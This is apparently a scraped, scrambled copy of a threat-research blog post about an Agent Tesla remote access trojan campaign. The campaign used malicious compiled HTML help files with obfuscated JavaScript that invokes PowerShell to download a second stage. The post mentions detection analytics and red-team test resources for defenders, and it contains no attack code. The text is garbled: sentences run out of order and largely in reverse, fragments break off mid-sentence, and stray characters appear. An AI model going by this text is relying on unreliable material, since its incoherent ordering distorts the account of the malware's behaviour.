![]() The file has an embedded and obfuscated JavaScript script that invokes PowerShell to download a second stage.įigure 1.1 shows the. This Agent Tesla variant uses a compiled HTML file (.chm) to conceal its malicious code and gain an initial foothold on the victim endpoint. Security teams that would like to understand how the execution of compiled HTML files looks like against their prevention or detection controls, we recommend having a look at the AtomicTestHarness for CHM and the Atomic Red Team technique T1218.001 built by the Red Canary team. High level flow of process execution for this sample is shown on Figure 1:įigure 1.1 shows the list of hashes that have this tag. Specifically, this campaign used a malicious compiled HTML (.CHM) file as a delivery method to drop and execute its first and second stages and load the remote access trojan. This sample led us to the “ ftp-boloni-ma” tag that compiles several samples of a campaign leveraging the Agent Tesla malware. Analysis Identification of Samplesįor this analysis, the STRT started the journey with a sample uploaded by JAMESWT_MHT on August 31st to Malware Bazaar. Additionally, we will highlight the detection analytics we released that can help cyber defenders in identifying signs of compromise. In this blog post, the Splunk Threat Research Team (STRT) describes the different tactics, techniques and procedures mapped to the ATT&CK framework leveraged by this remote access trojan. ![]() It is a full-featured RAT with multiple ways to exfiltrate organization data through keylogging, screen captures, credential stealing and much more. Agent Tesla has been in the top 10 most submitted samples in known open malware source repositories in cyber security communities like Malware Bazaar and Any.run. Threat actors behind this malware have leveraged many different methods to deliver their payload over time including macro enabled Word documents, Microsoft Office vulnerabilities, OLE objects and most recently, compiled HTML help files. ![]() ![]() NET framework that has knowingly been in operation since 2014. Agent Tesla is a remote access trojan (RAT) written for the. ![]()
0 Comments
Leave a Reply. |